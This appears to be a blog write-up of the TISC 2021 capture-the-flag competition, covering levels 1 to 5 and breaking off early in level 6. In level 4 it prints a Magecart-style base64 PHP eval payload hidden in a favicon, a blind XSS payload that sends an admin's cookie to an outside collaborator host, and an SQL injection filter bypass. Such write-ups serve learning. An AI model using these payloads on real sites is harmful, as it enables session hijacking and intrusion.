26 November 2021 at 03:32

Introduction

From 29 October to 14 November 2021, the Centre for Strategic Infocomm Technologies (CSIT) ran The InfoSecurity Challenge (TISC), an individual competition consisting of 10 levels that tested participants' cybersecurity and programming skills. This format created a big departure from last year's iteration (you can read my writeup here), which was a timed 48 hour challenge focused primarily on reverse engineering and binary exploitation.

Now with two weeks and 10 levels, the difficulty and variety of the challenges greatly increased. As you would expect, the prize pool grew accordingly – instead of $3,000 in vouchers in 2020, it was now $30,000 in cold hard cash. Participants unlocked the prize money in increments of $10,000 from level 8 to 10, with successful solvers splitting the pool equally. For example, if there was only one solver for level 10, they would claim the full $10,000 for themselves.

Hmm... why does this sound so familiar?

Squid Game Piggy Bank

However, since I was playing for charity, I was more interested in testing my skills, particularly in the binary exploitation domain. I placed 6th in the previous TISC and wanted to see what difference a year of learning had made.

I spent more than a hundred hours cracking my head against seemingly impossible tasks ranging from web, mobile, steganography, binary exploitation, custom shellcoding, cryptography and more. Levels 8 to 10 combined multiple domains and each one felt like a mini-CTF. While I considered myself reasonably proficient in web, I stepped way out of my comfort zone tackling the broad array of domains, especially as an absolute beginner in pwn, forensics, and steganography. Since I could only unlock each level by completing the previous one, I forced myself to learn new techniques every time.

I took away important lessons for both CTFs and day-to-day red teaming that I hope others will find useful as well. What distinguished TISC from typical CTFs was its dual emphasis on hacking AND programming – rather than exploiting a single vulnerability, I often needed to automate exploits thousands of times. You'll see what I mean soon.

Let's dive into the challenges. You may want to skip the earlier levels as they were fairly basic. You should definitely read levels 8-10, but honestly every challenge from level 3 onwards is interesting.

Level 1: Scratching the Surface

I warmed up on basic forensics and steganography challenges.

Part 1

Domains: Forensics

We've sent the following secret message on a secret channel.

Submit your flag in this format: TISC{decoded message in lower case}

file1.wav

The phrase “secret channel” suggested data smuggling via an audio channel, a common steganography technique. file1.wav played a cheery tune that I could not recognise. I quickly applied common tools and techniques like binwalk as described in this Medium article but found nothing. I even tried XORing both channels:

import wave
import struct

wav = wave.open("file1.wav", mode='rb')
frame_bytes = bytearray(list(wav.readframes(wav.getnframes())))
shorts = struct.unpack('H'*(len(frame_bytes)//2), frame_bytes)

shorts_three = struct.unpack('H'*(len(frame_bytes)//4), frame_bytes)


extracted_left = shorts[::2] 
extracted_right = shorts[1::2]
print(len(extracted_left))
print(len(extracted_right))
extracted_secret = shorts[2::3]
print(len(extracted_secret))


extractedLSB = ""
for i in range(0, len(extracted_left)):
    extractedLSB += str((extracted_left[i] & 1) ^ (extracted_right[i] & 1))
    
string_blocks = (extractedLSB[i:i+8] for i in range(0, len(extractedLSB), 8))
decoded = ''.join(chr(int(char, 2)) for char in string_blocks)
print(decoded[0:500])
wav.close()

Slightly panicking at this simple challenge, I returned to the “secret channel” hint. I separated each audio channel from the file with a command from Stack Overflow: ffmpeg -i file1.wav -map_channel 0.0.0 ch0.wav -map_channel 0.0.1 ch1.wav. I played ch1.wav and instead of funky music, I heard a series of beeps – Morse code! I used an online Morse Code audio decoder and got the flag.

TISC{csitislocatedinsciencepark}

Part 2

Domains: Forensics

This is a generic picture. What is the modify time of this photograph?

Submit your flag in the following format: TISC{YYYY:MM:DD HH:MM:SS}

file2.jpg

exiftool solved this in no time.

TISC{2021:10:30 03:40:49}

Part 3

Domains: Forensics, Cryptography

Nothing unusual about the Singapore logo right?

Submit your flag in the following format: TISC{ANSWER}

file3.jpg

The first appearance of the cryptography domain! I opened the file in the 010 Editor hex editor which highlighted an anomalous data blob at the end of the file.

file3.jpg Hex Bytes

The PK magic bytes identified this blob as a zip file. I extracted it with binwalk -e file3.jpg which revealed another image file picture_with_text.jpg. I opened it in 010 Editor and spotted some garbage bytes at the start of the file.

picture_with_text.jpg Hex Bytes

NAFJRE GB GUVF PUNYYRATR VF URER NCCYRPNEEBGCRNE looked like a simple text cipher. I popped into CyberChef and quickly discovered that it was ROT13 “encryption”.

TISC{APPLECARROTPEAR}

Part 4

Domains: Forensics

Excellent! Now that you have show your capabilities, CSIT SOC team have given you an .OVA virtual image in investigating a snapshot of a machine that has been compromised by PALINDROME. What can you uncover from the image?

Once you download the VM, use this free flag TISC{Yes, I've got this.} to unlock challenge 4 – 10.

https://transfer.ttyusb.dev/I6aQoOSuUuAoIIaqMWWkCcKyOk/windows10.ova

Check MD5 hash: c5b401cce9a07a37a6571ebe5d4c0a48

For guide on how to import the ova file into VirtualBox, please follow the VM importing guide attached.

Please download and install Virtualbox ver 6.1.26 instead of ver 6.1.28, as there has been reports of errors when trying to install the Win 10 VM image.

This challenge contained six flags but no rollercoasters. I naively imported the VM into Virtualbox and got to work.

What is the name of the user?

Submit your flag in the format: TISC{name}.

What is whoami?

TISC{adam}

Which time was the user's most recent logon? Convert it UTC before submitting.

Submit your flag in the UTC format: TISC{DD/MM/YYYY HH:MM:SS}.

I experienced my first facepalm moment of the competition (there would be many more to come). The most recent logon time got reset after I logged into the VM, so it was time to download Autopsy.

After Autopsy imported and processed the OVA file, I found the most recent logon time under OS Accounts > adam > Last Login and converted the timezone to UTC.

TISC{17/06/2021 02:41:37}.

A 7z archive was deleted, what is the value of the file CRC32 hash that is inside the 7z archive?

Submit your flag in this format: TISC{CRC32 hash in upper case}.

I found the deleted archive at Data Artifacts > Recycle Bin and generated the CRC32 hash with 7-Zip.

TISC{040E23DA}

Question1: How many users have an RID of 1000 or above on the machine?

Question2: What is the account name for RID of 501?

Question3: What is the account name for RID of 503?

Submit your flag in this format: TISC{Answer1-Answer2-Answer3}. Use the same case for the Answers as you found them.

I got all of the answers under OS Accounts although I was briefly confused by the system users.

TISC{1-Guest-DefaultAccount}

Question1: How many times did the user visit https://www.csit.gov.sg/about-csit/who-we-are ?

Question2: How many times did the user visit https://www.facebook.com ?

Question3: How many times did the user visit https://www.live.com ?

Submit your flag in this format: TISC{ANSWER1-ANSWER2-ANSWER3}.

Data Artifacts > Web History

TISC{2-0-0}

A device with the drive letter “Z” was connected as a shared folder in VirtualBox. What was the label of the volume? Perhaps the registry can tell us the “connected” drive?

Submit your flag in this format: TISC{label of volume}.

I found this a little difficult. I resorted to adding another shared folder to the VM then searching for the label name in Registry Editor to figure out which registry key controlled the volume labels. This led me to the registry path Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 which contained all the volume labels.

TISC{vm-shared}

A file with SHA1 0D97DBDBA2D35C37F434538E4DFAA06FCCC18A13 is in the VM… somewhere. What is the original name of the file that is of interest?

Submit your flag in this format: TISC{original name of file with correct file extension}.

Since Autopsy only supported SHA256 and MD5 hashes, I resorted to guessing that it was one of the files under Data Artifacts > Recent Documents. I extracted all of them and ran Get-FileHash -Algorithm SHA1 *. otter-singapore.lnk, which used to point to otter-singapore.jpg, matched the SHA1 hash.

TISC{otter-singapore.jpg}

Level 2: Dee Na Saw as a need

Domain: Network Forensics

We have detected and captured a stream of anomalous DNS network traffic sent out from one of the PALINDROME compromised servers. None of the domain names found are active. Either PALINDROME had shut them down or there's more to it than it seems.

This level contains 2 flags and both flags can be found independently from the same pcap file as attached here.

Flag 1 will be in this format, TISC{16 characters}.

Flag 2 will be in this format, TISC{17 characters}.

traffic.pcap

As a newbie to steganography, I felt that this level was the most “CTF-y” and actually got stuck for two days hunting flag 1 and ragequit for a while. Fortunately, I managed to get it after cooling off.

Flag 2

traffic.pcap consisted of a short series of DNS query responses.

file3.jpg Hex Bytes

A few anomalies stood out to me:

The domain names clearly contained some kind of exfiltration data and matched the format d33d<9 hex chars>.toptenspot.net.
The Time to Live (TTL) values constantly changed, which should not be the case with a typical DNS server.
The serial numbers also kept changing.

For the domain names, I noticed that the first two hex chars were always numeric e.g. 10, 11, 12. I extracted the hex chars with scapy and tried hex-decoding them but it only produced gibberish. After fiddling around with a few variations such as XORing consecutive bytes, I came across this CTF writeup that described Base32 encoding of data in DNS query names. Base32 encoding used a similar charset as hex numbers. I tried Base32 decoding the “hex chars” with CyberChef and immediately spotted a few interesting outputs such as <NON-ASCII CHARS>ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghij. After playing around with the offsets, I realised that the first two (numeric) characters were bad bytes, while the rest of the characters made up a valid base32 string.

I automated the decoding routine with a quick script.

from scapy.all import *
from scapy.layers.dns import DNS
import base64

dns_packets = rdpcap('traffic.pcap')
encoded = ''

for packet in dns_packets:
    if packet.haslayer(DNS):
        encoded += packet[DNS].qd.qname[6:13].decode('utf-8')

decoded = base64.b32decode(encoded[:-(len(encoded) % 8)]).decode('utf-8')
print(decoded)

This produced a bunch of lorem ipsum text along with the second flag.

TISC{n3vEr_0dd_0r_Ev3n}

Flag 1

With the first anomalous property solved, I focused on the TTLs and serial numbers, wasting many hours chasing what eventually turned out to be red herring. The TTLs and serial numbers generally matched a pattern – Serial number + TTL = unix timestamp – that made it seem like I was on the right path. After many fruitless hours spent mutating these values in increasingly insane permutations, I gave up and took my break.

When I returned, I went back to basics and considered the numeric “bad bytes” from the DNS domain names. I decided to check the range of these values. They went from 01 to 64... could it be? I transposed the numbers to the base64 alphabet, then base64-decoded them... yep, it was a DOCX file.

Pictured below is the moment the challenge creator thought of the TTL red herring.

file3.jpg Hex Bytes

Moving on, I extracted the DOCX file with scapy.

from scapy.all import *
from scapy.layers.dns import DNS
import base64

dns_packets = rdpcap('traffic.pcap')

alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
encoded = ''

for packet in dns_packets:
    if packet.haslayer(DNS):
        encoded += alphabet[int(packet[DNS].qd.qname[4:6].decode('utf-8'))-1]

decoded = base64.b64decode(encoded + '==')
file = open('output.docx', 'wb')
file.write(decoded)
file.close()

The word document contained the pretty obvious clue now you see me, what you seek is within. Since DOCX files are actually ZIP files in disguise, I unzipped the DOCX and grepped the files for the flag format TISC{. I found what I was looking for in word/theme/theme1.xml.

TISC{1iv3_n0t_0n_3vi1}

Level 3: Needle in a Greystack

Domains: Reverse Engineering

An attack was detected on an internal network that blocked off all types of executable files. How did this happen?

Upon further investigations, we recovered these 2 grey-scale images. What could they be?

1.bmp

2.bmp

I opened both files in 010 Editor and noticed that both 1.bmp and 2.bmp embedded data in the BMP pixel colour bytes in reverse order. 1.bmp contained a Windows executable while 2.bmp contained simple ASCII text.

1.bmp Hex Bytes

2.bmp Hex Bytes

I extracted them with a simple Python script.

with open("1.bmp", "rb") as bmp_1, open("1.exe", "wb") as out_file:
    data = bmp_1.read()

    output = data[-148:][:-3]
    for i in range(1, 145):
        output += data[-((i + 1) * 148):-(i * 148)][:-3]

    out_file.write(output)

with open("2.bmp", "rb") as bmp_1, open("2.txt", "wb") as out_file:
    data = bmp_1.read()

    output = data[-100:][:-1]
    for i in range(1, 99):
        output += data[-((i + 1) * 100):-(i * 100)][:-1]

    out_file.write(output)

Running 1.exe, I received the following output:

> .\1.exe
HELLO WORLD
flag{THIS_IS_NOT_A_FLAG}

Digging deeper, I decompiled the executable with IDA and noticed that the main function checked for a .txt file in the first argument.

  puts("HELLO WORLD");
  if ( argc < 2 )
    goto LABEL_34;
  v3 = argv[1];
  v4 = strrchr(v3, 46);
  if ( !v4 || v4 == v3 )
    v5 = (const char *)&unk_40575A;
  else
    v5 = v4 + 1;
  v6 = strcmp("txt", v5);
  if ( v6 )
    v6 = v6 < 0 ? -1 : 1;
  if ( v6 )
  {
LABEL_34:
    puts("flag{THIS_IS_NOT_A_FLAG}");
    return 1;
  }
  fopen_s(&Stream, argv[1], "rb");
  v7 = (void (__cdecl *)(FILE *, int, int))fseek;
  if ( Stream )
  {
    fseek(Stream, 0, 2);
    v8 = ftell(Stream);
    v23 = v8 >> 31;
    v24 = v8;
    fclose(Stream);
  }

I tested this with a random text file, which yielded the following output.

> .\1.exe .\2.txt
HELLO WORLD
Almost There!!

Looking further down the pseudocode for main, I noticed that it called a function that VirtualAlloced some memory, copied data into it, then ran LoadLibraryA. Since Almost There!! did not appear as a string in 1.exe, I suspected that it came from the dynamically loaded library.

I set a breakpoint at the memcpy and ran the IDA debugger. Checking the arguments to memcpy at the breakpoint, I confirmed that it copied an executable file that included the magic bytes MZ followed by This program cannot be run in DOS mode.

IDA Debugger 1.exe

Now I needed to dump this data. I manually figured out the size of the file by checking for the Application Manifest XML text that appeared at the end of the source buffer. Next, I dumped it in WinDBG with .writemem b.exe ebx L2600.

The executable turned out to be a DLL that contained the decoding routine in the dllmain_dispatch function, which was executed every time 1.exe loaded it with LoadLibraryA.

The DLL decompiled to pseudocode which I identified as the RC4 key-scheduling algorithm (KSA) due to the 256-iteration loop.

if ( Block )
    {
    v4 = strcmp(Block, "Words of the wise may open many locks in life.");
    if ( v4 )
        v4 = v4 < 0 ? -1 : 1;
    if ( !v4 )
        puts("*Wink wink*");
    }
    memset(v18, 0, 0xFFu);
    for ( i = 0; i < 256; ++i )           // RC4 Key Scheduling Algorithm
    *((_BYTE *)&Stream[1] + i) = i;
    v6 = 0;
    Stream[0] = 0;
    do
    {
    v7 = *((_BYTE *)&Stream[1] + v6);
    v8 = (FILE *)(unsigned __int8)(LOBYTE(Stream[0]) + Block[v6 % 0xEu] + v7);
    Stream[0] = v8;
    *((_BYTE *)&Stream[1] + v6++) = *((_BYTE *)&Stream[1] + (_DWORD)v8);
    *((_BYTE *)&Stream[1] + (_DWORD)v8) = v7;
    }

The pseudocode contained two more important tidbits of information. Firstly, “Words of the wise may open many locks in life” looked like a hint. Secondly, The KSA loop used 0xE as the modulus, telling me that the RC4 key was 14 bytes long.

At first, I fell down a rabbit hole trying to guess the key. Given the name of the challenge and Words of the wise, I thought it had something to do with Gandalf from Lord of the Rings and tried all kinds of phrases associated with him, including youwillnotpass. After a long time, I returned to my senses and realised that the key probably existed in the second file I had extracted earlier. It contained a huge list of words, including rubywise – this was probably what the “Words of the wise” hint was referring to.

I brute forced the keys with a quick Python script.

import subprocess
import os

with open('keys.txt') as file:
    lines = file.readlines()
    lines = [line.rstrip() for line in lines]
    for line in lines:
        with open('key.txt', 'w') as key:
            key.write(line)
        result = subprocess.run([".\\1.exe", ".\\2.txt"], capture_output=True).stdout
        if b'TISC' in result:
            print(line)
            print(result)

TISC{21232f297a57a5a743894a0e4a801fc3}

Level 4: The Magician's Den

Domains: Web Pentesting

One day, the admin of Apple Story Pte Ltd received an anonymous email.

===

Dear admins of Apple Story,

We are PALINDROME.

We have took control over your system and stolen your secret formula!

Do not fear for we are only after the money.

Pay us our demand and we will be gone.

For starters, we have denied all controls from you.

We demand a ransom of 1 BTC to be sent to 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2 by 31 dec 2021.

Do not contact the police or seek for help.

Failure to do so and the plant is gone.

We planted a monitoring kit so do not test us.

Remember 1 BTC by 31 dec 2021 and we will be gone.

Muahahahaha.

Regards,

PALINDROME

===

Management have just one instruction. Retrieve the encryption key before the deadline and solve this.

http://wp6p6avs8yncf6wuvdwnpq8lfdhyjjds.ctf.sg:14719

Note: Payloads uploaded will be deleted every 30 minutes.

Finally, a web challenge! The website featured a ransom note and a link to a payment page.

Hacked Page

The challenge came with a free hint: “What are some iconic techniques that the actor PALINDROME mimicked Magecart to evade detection?” Based on this, I researched Magecart's tactics, techniques, and procedures (TTPs) and found out that the threat actor hid malicious payloads in image files. I checked each of the loaded images and noticed that favicon.ico contained the following PHP code: eval(base64_decode('JGNoPWN1cmxfaW5pdCgpO2N1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX1VSTCwiaHR0cDovL3MwcHE2c2xmYXVud2J0bXlzZzYyeXptb2RkYXc3cHBqLmN0Zi5zZzoxODkyNi94Y3Zsb3N4Z2J0ZmNvZm92eXdieGRhd3JlZ2pienF0YS5waHAiKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9QT1NULDEpO2N1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX1BPU1RGSUVMRFMsIjE0YzRiMDZiODI0ZWM1OTMyMzkzNjI1MTdmNTM4YjI5PUhpJTIwZnJvbSUyMHNjYWRhIik7JHNlcnZlcl9vdXRwdXQ9Y3VybF9leGVjKCRjaCk7'));. The base64 string decoded to:

$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,"http://<DOMAIN>:18926/xcvlosxgbtfcofovywbxdawregjbzqta.php");
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,"14c4b06b824ec593239362517f538b29=Hi%20from%20scada");
$server_output=curl_exec($ch);

This PHP code sent the following HTTP request:

POST /xcvlosxgbtfcofovywbxdawregjbzqta.php HTTP/1.1
Host: <DOMAIN>:18926
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 190

14c4b06b824ec593239362517f538b29=Hi%20from%20scada

Which returned the following response:

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2021 05:50:11 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.2.2
Vary: Accept-Encoding
Content-Length: 77
Connection: close
Content-Type: text/html; charset=UTF-8

New record created successfully in data/9bcd278b611772b366155e078d529145.html

The server created a HTML file from my input. I did a quick check for SQL injection (nothing), then moved on the next most likely vulnerability – a blind cross-site scripting (XSS) attack. Instead of Hi%20from%20scada, I entered <img src="http://zdgrxeldiyxju6mmytt0cdx3muskg9.burpcollaborator.net" />. After a few minutes, I got a pingback!

GET / HTTP/1.1
Referer: http://magicians-den-web/data/9bcd278b611772b366155e078d529145.html
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: en,*
Host: zdgrxeldiyxju6mmytt0cdx3muskg9.burpcollaborator.net

I also realised that the PHP code sent the POST request to a different website at http://<DOMAIN>:18926/. The website included a “Latest sample data” page containing the HTML files created by the POST request, which helped me debug my payloads.

Sample Data Page

Usually, XSS CTF challenges featured data exfiltration via the victim's browser. At first, I suspected that because the victim's User Agent PhantomJS/2.1.1 suffered from a known local file disclosure vulnerability, I was meant to leak /etc/passwd. However, after multiple attempts, I got nowhere, probably because the vicitm accessed the XSS payload from a http:// URL rather than a file:// URI that could bypass Cross-Origin Resource Sharing (CORS) protections.

Going back to the drawing board, I decided to perform some directory busting with ffuf and discovered that a login page existed at http://<DOMAIN>:18926/login.php.

Unfortunately, the signup was disabled, but since the PHPSESSID cookie controlled the user's session, I found the way forward: I needed to leak the admin's session cookie using the blind XSS. I modified my payload to <script>document.body.appendChild(document.createElement("img")).src='http://zdgrxeldiyxju6mmytt0cdx3muskg9.burpcollaborator.net?'%2bdocument.cookie</script> and received a pingback at /?PHPSESSID=64f15ffeb7a191812bddfb9a855e0ffb.

After adding the session cookie, I browsed to the login page and got redirected to http://<DOMAIN>:18926/landing_admin.php.

Landing Admin Page

The page listed actions taken by targets and allowed me to filter the results by isALIVE or isDEAD. When I changed the filter, the page sent the following HTTP request:

POST /landing_admin.php HTTP/1.1
Host: <DOMAIN>:18926
Content-Length: 14
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://<DOMAIN>:18926
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://<DOMAIN>:18926/landing_admin.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=e9b94a5a71d62d9171130ad5890f38ef
Connection: close

filter=isALIVE

Other than the filtered actions, the response included the text Filter applied: <VALUE OF FILTER PARAM>. Switching to the isDEAD filter returned the actions MaybeMessingAroundTheFilterWillHelp? and ButDoYouKnowHow?, hinting at an SQL injection.

I confirmed that the POST /landing_admin.php request was vulnerable to SQL injection using isomorphic SQL statements; adding a simple ' to filter=isALIVE caused the server to omit the Filter applied message and adding '' restored it. However, jumping straight to ' OR '1'='1 failed. Puzzled, I continued testing several payloads and eventually noticed that certain characters were sanitized because they never appeared in the Filter applied message. By fuzzing all possible URL-encoded ASCII characters, I reconstructed the blacklist !"$%&*+,-./:;<=>?@[]^_`{|}~, which only left the special characters #'(). Additionally, I found out that any filter parameter longer than 7 characters always failed.

Since the injected SQL statement probably looked something like SELECT * from actions WHERE status='<PAYLOAD>', I reasoned that one possible valid payload was 'OR(1)#, creating the final statement SELECT * from actions WHERE status=''OR(1)#'. This neatly dumped all possible actions while commenting out the extra '. Thankfully, the payload worked and the response included the flag as one of the actions.

TISC{H0P3_YOu_eNJ0Y-1t}

Level 5: Need for Speed

Domains: Binary Manipulation, IoT Analytics

We have intercepted some instructions sent to an autonomous bomb truck used by PALINDROME. However, it seems to be just a BMP file of a route to the Istana!

Analyze the file provided and uncover PALINDROME's instructions. Find a way to kill the operation before it is too late.

Ensure the md5 checksum of the given file matches the following before starting: 26dc6d1a8659594cdd6e504327c55799

Submit your flag in the format: TISC{flag found}.

Note: The flag found in this challenge is not in the TISC{...} format. To assist in verifying if you have obtained the flag, the md5 checksum of the flag is: d6808584f9f72d12096a9ca865924799.

ATTACHED FILES

route.bmp

This steganography challenge stumped many participants. On the surface, route.bmp looked like a simple screenshot of a map.

Using stegsolve, I noticed interesting outputs when I applied the plane 0 filter on either red, green, or blue values.

Stegsolve

The top half of the image resembled static instead of the expected black and white outline of the original image. While researching more image steganography techniques, I came across another CTF writeup which featured a similar “static” generated by stegsolve. The writeup described how the image hid the data in the least significant bytes of each pixel's RGB values. I applied the script from the writeup to extract the data but encountered a slight corruption. Although the first few bytes 37 7A C2 BC C2 AF 27 1C almost matched the magic bytes of a 7-Zip file 37 7A BC AF 27 1C, the extra C2 bytes got in the way of a proper decoding.

I decided to compare the expected binary output against the real output of the script.

Expected: 00110111 01111010 10111100 10101111 00100111 00011100     # 37 7A BC AF 27 1C
Real:     00110111001111011010001011100010000111101011010011100     # 37 3d a2 e2 1e b4 1c

After reading the writeup closely, I realised that the script correctly skipped every 9th bit but converted the bits to bytes too early. I fixed this bug to get a working decoder.

##!/usr/bin/env python
from PIL import Image
import sys

## Trim every 9th bit
def trim_bit_9(b):
    trimmed = ''
    while len(b) != 0:
        trimmed += b[:8]
        b = b[9:]
    return trimmed

## Load image data
img = Image.open(sys.argv[1])
w,h = img.size
pixels = img.load()

binary = ''
for y in range(h):
    for x in range(w):
        # Pull out the LSBs of this pixel in RGB order
        binary += ''.join([str(n & 1) for n in pixels[x, y]])

trimmed = trim_bit_9(binary)
with open('out.7z', 'wb') as file:
    file.write(bytes(int(trimmed[i : i + 8], 2) for i in range(0, len(trimmed), 8)))

The extracted 7-Zip file contained two files: update.log and candump.log.

updated.log contained the following text:

see turn signals for updated abort code :)
- P4lindr0me

Meanwhile, candump.log was a huge file that contained lines like this:

(1623740188.969099) vcan0 136#000200000000002A
(1623740188.969107) vcan0 13A#0000000000000028
(1623740188.969109) vcan0 13F#000000050000002E
(1623740188.969112) vcan0 17C#0000000010000021
(1623740225.790964) vcan0 324#7465000000000E1A
(1623740225.790966) vcan0 37C#FD00FD00097F001A
(1623740225.790968) vcan0 039#0039
(1623740225.792217) vcan0 183#0000000C0000102D
(1623740225.792231) vcan0 143#6B6B00E0
(1623740225.794607) vcan0 095#800007F400000017

What was I looking at? After a bit of Googling, I found out that candump was a tool to dump Controller Area Network (CAN) bus traffic. CAN itself was a network protocol used by vehicles. By searching for some of the lines in candump.log, I discovered a sample CAN log generated by ICSim. After doing some more research on the CAN protocol, I deduced that each line in the CAN dump matched the format (<TIMESTAMP>) <INTERFACE> <CAN INSTRUCTION ID>#<CAN INSTRUCTION DATA>.

Based on the “see turn signals” clue, I needed to find the CAN instruction ID that matched the “turn signal” instruction. The CAN instruction data for turn signals probably contained the flag. I reviewed the source code of ICSim and saw that ICSim set the turn signal ID to either a default constant or some randomised value:

##define DEFAULT_SIGNAL_ID 392 // 0x188
...
  signal_id = DEFAULT_SIGNAL_ID;
  speed_id = DEFAULT_SPEED_ID;

  if (randomize || seed) {
	if(randomize) seed = time(NULL);
	srand(seed);
	door_id = (rand() % 2046) + 1;
	signal_id = (rand() % 2046) + 1;

Sadly, since none of the CAN dump lines contained the 188 instruction ID, I knew that the turn signal instruction ID had been randomised.

Based on the code and an ICSim tutorial, I also knew that the data values for the turn signal instruction could be 00 (both off), 01 (left on only), 02 (right on only), or 03 (both on). As such, I attempted to filter out all CAN instruction IDs that had at most 4 unique data values in candump.log. The instruction ID 40C looked promising because it only had the following unique data values: 40C: ['0000000004000013', '014A484D46413325', '0236323239533039', '033133383439000D']. However, despite spending hours hex-decoding the values, XORing them, and so on, I failed to retrieve any usable data.

After wasting many time on this rabbit hole, I re-read the source code for sending a turn signal on ICSim.

void send_turn_signal() {
	memset(&cf, 0, sizeof(cf));
	cf.can_id = signal_id;
	cf.len = signal_len;
	cf.data[signal_pos] = signal_state;
	if(signal_pos) randomize_pkt(0, signal_pos);
	if(signal_len != signal_pos + 1) randomize_pkt(signal_pos+1, signal_len);
	send_pkt(CAN_MTU);
}

I noticed my mistake: the send_turn_signal function set only one byte in the CAN message data to the signal state byte, then randomised the rest of the data bytes. This meant that the turn signals would have far more than four possible unique data values! Instead, I should have filtered the CAN dump for turn signal IDs whose data values always included either 00, 01, 02, and 03 in a fixed position. I quick wrote a new script to do this.

can_combinations = dict()
can_count = dict()

with open('candump.log', 'r') as file:
    while line := file.readline():
        can_id = line[26:29]
        can_data = line[30:].strip()
        if can_id not in can_combinations:
            can_combinations[can_id] = [can_data]
        else:
            if can_data not in can_combinations[can_id]:
                can_combinations[can_id].append(can_data)
        if can_id not in can_count:
            can_count[can_id] = 1
        else:
            can_count[can_id] += 1

for can_id in can_combinations:
    if all(('01' in data or '02' in data or '03' in data or '00' in data) for data in can_combinations[can_id]):
        print("{} {}: {}".format(can_id, can_count[can_id], can_combinations[can_id]))

Out of the possible filtered CAN IDs, 0C7 also looked promising because some of the data values contained ASCII characters when hex-decoded.

0C7: ['00006c88000000', '0E003100000011', '00006664000000', '00003369000066', '00E75f00D30000', '3A0931E20000E0', '07003500000000', '00005fA1000038', '00007782600000', '3521683F00016C', '00003400000005', '00003700000100', '4F005f00000000', '00006802000100', '00003483000000', 'B900702D000100', '00007006000000', '00B63300000117', 'F8786e000C00D6', '0092359B000100', '90005f77F80000', 'B3457700000100', '00006800000030', 'C9F13300AA0100', '00B56e00000000', '00005f98AB0186', '770079003800D0', '0000305D000100', 'F3427500000064', '00002700000100', 'A0007200460032', '00003312000100', 'C2005f000000E2', '00006200790100', '00007500000000', '00003500000000', '004A7900000000', '00005f00000000', '00006d33000000', '000034000000BF', '00136b0000005C', '00F63100000000', '00006e00AA0099', '15003600000000', '7B005fD6000000', 'BC003020000000', 'B7003700000000', '0000680000006C', '00003300310000', '50007200A50000', '00005f00A60000', '00E67000A200A2', '77006c00450059', '89003400000000', '59006e2AE500D1', '00E23500F80000', '00912eC2B40000', '00002d00000100', '003E6a007B0060', '00005f00F70132', '0000304F000000', '00FB5f00000100', '44576800000000', '00005f00000193', 'FD006eDE450000', '00895f00900100', '00006c00910000', '00005fDDD10000', '00003300000200', '00CA5f00CC0000', 'E4FB6e00000000', '00005f00770000', '00006e00000000', '00005f00810000', '00003049940000', '00F95f003600D4', '6E7B6e936C0051']

After a lot of manual copying and pasting, I found that these ASCII characters appeared in the third byte of each instruction's data. Based on this hunch, I wrote another short script to extract and decode these bytes.

can_combinations = dict()
can_count = dict()

encoded = ''
with open('candump.log', 'r') as file:
    while line := file.readline():
        can_id = line[26:29]
        can_data = line[30:].strip()
        if can_id == '0C7':
            encoded += can_data[4:6]

print(bytes.fromhex(encoded).decode('utf-8'))

This produced l1f3_15_wh47_h4pp3n5_wh3n_y0u'r3_bu5y_m4k1n6_07h3r_pl4n5.-j_0_h_n_l_3_n_n_0_n which matched the checksum d6808584f9f72d12096a9ca865924799.

TISC{l1f3_15_wh47_h4pp3n5_wh3n_y0u'r3_bu5y_m4k1n6_07h3r_pl4n5.-j_0_h_n_l_3_n_n_0_n}

Level 6: Knock Knock, Who's There

Domains: Network Forensics, Reverse Engineering

Traffic capture suggests that a server used to store OTP passwords for PALINDROME has been found. Decipher the packets and figure out a way to get in. Move quick, time is of essence.

https://transfer.ttyusb.dev/s4is2/traffic_capture.pcapng

Server at 128.199.211.243

Note: The challenge instance may be reset periodically so do save a copy of any files you might need on your machine.

I was halfway there, but I faced the most mind-bending level yet. I downloaded the massive 614 MB PCAP file containing all kinds of traffic, including SSH, SMB, HTTP, and more. Based on the title of the level and “time is of essence” in the description, I suspected that the challenge involved port knocking. I needed to discover the port knocking sequence needle in the haystack and thereafter use it to access the server at 128.199.211.243. I ran a full nmap scan of the server which returned zero ports – another strong hint that port knocking was the solution.

To start off, I scanned the PCAP with VirusTotal and Suricata, both of which flagged malicious traffic.

08/26/2021-19:47:30.560000  [**] [1:2008705:5] ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 192.168.202.68:40111 -> 192.168.23.100:445
